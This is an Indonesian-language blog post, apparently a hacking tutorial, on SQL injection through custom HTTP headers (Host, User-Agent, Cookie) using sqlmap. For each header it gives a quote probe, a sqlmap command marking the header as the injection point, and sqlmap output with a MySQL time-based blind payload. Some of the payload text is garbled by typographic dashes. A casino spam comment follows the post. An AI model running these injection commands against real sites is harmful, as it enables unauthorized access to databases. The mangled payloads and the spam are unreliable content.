Skip to content

Custom HTTP Header Injection With Sqlmap


HTTP Header adalah pasangan nama atau nilai yang ditampilkan dalam pesan permintaan dan respons dari header pesan untuk Hypertext Transfer Protocol (HTTP). Biasanya, nama header dan nilainya dipisahkan oleh tanda titik dua. Header HTTP adalah bagian integral dari permintaan dan respons HTTP. Dalam istilah yang lebih sederhana, header HTTP adalah kode yang mentransfer data antara server Web dan browser. Header HTTP terutama ditujukan untuk komunikasi antara server dan klien di kedua arah.

SQL injection adalah jenis aksi hacking pada keamanan komputer di mana seorang penyerang bisa mendapatkan akses ke basis data di dalam sistem dengan sintak2 SQL.

Dibawah ini yang termasuk vuln terhadap SQL Injection

1. Header Host Injection Dengan Sqlmap

GET /index.php HTTP/1.1
Host: 192.168.1.8:8080
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:10.0) Gecko/20100101 Firefox/10.0'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.8:8080/index.php
Cookie: security=impossible; security=impossible; 
Cara Inject custom HTTP Header nya dengan command seperti berikut 

Host: 192.168.1.8:8080' =>> error

root@nubychan:~# python sqlmap.py -u site.com — header=”Host: 1*”
Parameter: Host #1* ((custom) HEADER)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: 1' OR 3 AND SLEEP(5) — GAYV21=6 AND 000953=000953 — 
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
2. Header User-Agent Injection Dengan Sqlmap

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:10.0) Gecko/20100101 Firefox/10.0' ==> Error
Cara Inject User-Agent nya dengan command seperti berikut 

root@nubychan:~# python sqlmap.py -u site.com — header=”User-Agent: 1*”
Parameter: User-Agent #1* ((custom) HEADER)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: 1' OR 3 AND SLEEP(5) — GAYV21=6 AND 000953=000953 — 
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
3. Header Cookie Injection

Cookie: security=impossible; security=impossible; PHPSESSID=cut7n8ujh83pie6ib5dl2304k0 ==> no error
Cookie: 1' ==> error



Cara Inject Header Cookie nya dengan command seperti berikut 

root@nubychan:~# python sqlmap.py -u site.com — header=”Cookie: 1*”
Parameter: Cookie #1* ((custom) HEADER)
 Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind
 Payload: 1' OR 3 AND SLEEP(5) — GAYV21=6 AND 000953=000953 — 
 Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
Thx to Doraemon v1.5 & z3r00_c00d3r

Custom HTTP Header Injection With Sqlmap

1 Comments

1 Comments

  1. Casino of Chance Casino Review 2021 - 나비효과.com
    Casino of Chance Casino 1xbet korean is 바카라 사이트 licensed in Costa Rica and is one of the best casinos owned by the company. Players worrione can 바카라사이트 get a great welcome bonus and  Rating: 4.5 casinosites.one · ‎Review by Casino.in

    ReplyDelete

Post a Comment